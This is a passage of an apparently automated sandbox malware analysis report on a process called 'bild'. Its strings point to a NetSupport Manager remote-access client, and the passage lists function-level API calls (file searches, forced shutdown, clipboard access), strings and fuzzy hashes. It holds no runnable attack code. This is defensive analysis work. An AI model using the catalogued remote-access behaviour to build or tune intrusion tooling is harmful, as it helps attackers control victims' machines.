                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken
                                                                                      • String ID:
                                                                                      • API String ID: 4114910276-0
                                                                                      • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                      • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                      Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                      • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                      Function 6C5FA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,6C5F6F16,00000000,?,6C5FD40B,00000001,6C5F6F16,00000000,00000000,00000000,?,6C5F6F16,00000001,00000214), ref: 6C5FA0C5
                                                                                        • Part of subcall function 6C5F60F9: __getptd_noexit.LIBCMT ref: 6C5F60F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                      • Instruction ID: 007abf6902efb8a09d600b6b51ba5231d223184a43b03df5e63c19687b988cdf
                                                                                      • Opcode Fuzzy Hash: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
                                                                                      • Instruction Fuzzy Hash: 4B01D8313062119FFB1D9E26DC54B57376CEF81369F114629E835C7990DB75D802CE52
                                                                                      Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __waccess_s
                                                                                      • String ID:
                                                                                      • API String ID: 4272103461-0
                                                                                      • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                      • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                      Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3646066109-0
                                                                                      • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                      • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                      Function 004B1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _NSMClient32@8.PCICL32(?,?,?,004B10A2,00000000), ref: 004B100B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4161045215.00000000004B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004B0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4160974107.00000000004B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_4b0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Client32@8
                                                                                      • String ID:
                                                                                      • API String ID: 433899448-0
                                                                                      • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction ID: a6e21a181334ad8d68c0d1b68244e85e5dbeb702fee524da2babc4fc0ac728fe
                                                                                      • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction Fuzzy Hash: 3EB092B212434D9B8714EE99E851CBB33DCAA98600B40080ABD0543682CA65FC60A675

                                                                                      Non-executed Functions

                                                                                      Function 1102D330 Relevance: 70.6, APIs: 21, Strings: 19, Instructions: 575sleepfileshutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                      • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                        • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                        • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                        • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                        • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                      • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                      • SetEvent.KERNEL32(00000250), ref: 1102D3E7
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                      • PostThreadMessageA.USER32(00001E6C,00000000,00000000,00000000), ref: 1102D5BC
                                                                                      • CloseHandle.KERNEL32(00000294), ref: 1102D815
                                                                                      • _free.LIBCMT ref: 1102D825
                                                                                      • _free.LIBCMT ref: 1102D841
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                      • _memset.LIBCMT ref: 1102D983
                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                      • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                      • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                      • String ID: *.*$051829$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                      • API String ID: 2369127096-616690651
                                                                                      • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                      • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                      Function 1103B160 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 196fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                      • _sprintf.LIBCMT ref: 1103B2BB
                                                                                      • _fputs.LIBCMT ref: 1103B330
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                      • _free.LIBCMT ref: 1103B336
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                      • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 383231468-3762817415
                                                                                      • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                      • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                      Function 11033010 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                      • API String ID: 0-293745777
                                                                                      • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                      • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                      Function 11093080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                      • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                        • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                        • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                        • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                        • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                        • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                        • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                        • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                        • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                      • String ID: NSMClassList$NSMFindClassEvent
                                                                                      • API String ID: 1622498684-2883797795
                                                                                      • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                      • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                      Function 1115B1D0 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
